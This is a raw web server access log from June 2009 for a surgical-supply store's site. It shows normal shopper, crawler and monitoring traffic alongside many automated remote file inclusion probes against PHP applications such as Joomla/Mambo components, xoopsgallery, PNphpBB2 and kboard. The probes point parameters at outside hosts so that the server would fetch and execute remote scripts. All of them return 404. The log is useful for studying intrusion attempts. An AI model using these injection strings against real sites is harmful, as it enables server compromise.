214.1.240.252 - - [16/Jun/2009:01:04:09 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:09 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:10 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:10 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:10 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:10 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:10 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:11 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:11 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:11 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:11 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
63.147.72.145 - - [16/Jun/2009:01:04:14 -0400] "GET /logs/appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jun/2009:01:04:14 -0400] "GET /appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jun/2009:01:04:14 -0400] "GET /logs/access_log.Q109051800%20%20/appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
214.1.240.252 - - [16/Jun/2009:01:04:24 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0086B8416E321500565F09A+M37+ENG HTTP/1.1" 200 76272 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:26 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086B8416E321500565F09A+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:26 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086B8416E321500565F09A+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:26 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086B8416E321500565F09A+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:35 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086B8416E321500565F09A+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
199.120.90.222 - - [16/Jun/2009:01:04:35 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_custompages&cpage=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:04:36 -0400] "GET /logs/access_log.Q109060900%20%20//index.php?option=com_custompages&cpage=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:01:04:38 -0400] "GET /logs/access_log.Q109060600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:04:41 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:04:41 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:04:41 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:04:41 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jun/2009:01:04:53 -0400] "GET /logs/access_log.Q109050700%20%20/appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:01:05:16 -0400] "GET /logs/error_log.Q108020700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
214.1.240.252 - - [16/Jun/2009:01:05:27 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0086B8446162E5006E7F09A+M37+ENG HTTP/1.1" 200 60009 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086B8416E321500565F09A+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:05:30 -0400] "GET /images/items/0531037_THUMB.JPG HTTP/1.1" 200 2749 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086B8446162E5006E7F09A+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:05:30 -0400] "GET /images/items/0531033_THUMB.JPG HTTP/1.1" 200 2141 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086B8446162E5006E7F09A+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:05:30 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086B8446162E5006E7F09A+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
199.120.90.222 - - [16/Jun/2009:01:06:00 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_custompages&cpage=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:06:01 -0400] "GET /logs/access_log.Q109060900%20%20//index.php?option=com_custompages&cpage=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.145.152.113 - - [16/Jun/2009:01:07:04 -0400] "GET /logs/access_log.Q109051300//bbs/skin/zero_vote/error.php//skin/zero_vote/error.php?dir=http://food114.tv/banner/shirohige/fxid.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
75.145.152.113 - - [16/Jun/2009:01:07:04 -0400] "GET /logs/access_log.Q109051700//bbs/skin/zero_vote/error.php//skin/zero_vote/error.php?dir=http://food114.tv/banner/shirohige/fxid.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:01:07:42 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:01:08:36 -0400] "GET /logs/access_log.Q109060600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:01:09:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
38.99.13.118 - - [16/Jun/2009:01:09:48 -0400] "GET /logs/access_log.Q107121800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.249.36.194 - - [16/Jun/2009:01:10:03 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:10:03 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:10:03 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:01:10:14 -0400] "GET /logs/index.php?lg=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:01:10:14 -0400] "GET /index.php?lg=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:01:10:14 -0400] "GET /logs/access_log.Q109051100%20%20/index.php?lg=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:10:16 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:01:11:21 -0400] "GET /logs/access_log.Q109052100/admin.cropcanvas.php?cropimagedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
121.165.73.157 - - [16/Jun/2009:01:11:21 -0400] "GET /logs/admin.cropcanvas.php?cropimagedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
121.165.73.157 - - [16/Jun/2009:01:11:21 -0400] "GET /admin.cropcanvas.php?cropimagedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
121.165.73.157 - - [16/Jun/2009:01:11:21 -0400] "GET /logs/access_log.Q109053000/admin.cropcanvas.php?cropimagedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
121.165.73.157 - - [16/Jun/2009:01:11:26 -0400] "GET /logs/access_log.Q109052200%20%20/index.php?lg=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:01:12:19 -0400] "GET /logs/access_log.Q108092000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.59.12.99 - - [16/Jun/2009:01:14:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.82.228.83 - - [16/Jun/2009:01:14:39 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:14:39 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:14:39 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:14:40 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:14:43 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:14:45 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:14:45 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:14:45 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.234.213.147 - - [16/Jun/2009:01:15:00 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
69.234.213.147 - - [16/Jun/2009:01:15:00 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
38.99.13.118 - - [16/Jun/2009:01:15:00 -0400] "GET /logs/error_log.Q108070800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
69.234.213.147 - - [16/Jun/2009:01:15:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
69.234.213.147 - - [16/Jun/2009:01:15:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
38.99.44.103 - - [16/Jun/2009:01:16:12 -0400] "GET /logs/error_log.Q107062400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
72.82.228.83 - - [16/Jun/2009:01:16:25 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:16:25 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:16:47 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:16:47 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:01:16:52 -0400] "GET /logs/access_log.Q109060600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:01:17:10 -0400] "GET /logs/error_log.Q107122600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.151.2.98 - - [16/Jun/2009:01:17:21 -0400] "GET /logs/access_log.Q109050900//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:17:21 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:17:21 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:17:23 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:17:28 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:17:29 -0400] "GET /logs/access_log.Q109050900//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:17:30 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:17:30 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:18:25 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:18:28 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:18:28 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:18:34 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:18:34 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:18:36 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:18:37 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:01:18:53 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
66.249.71.54 - - [16/Jun/2009:01:19:04 -0400] "GET /images/index2_csblades.jpg HTTP/1.1" 200 3428 "-" "Googlebot-Image/1.0"
209.59.12.99 - - [16/Jun/2009:01:19:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
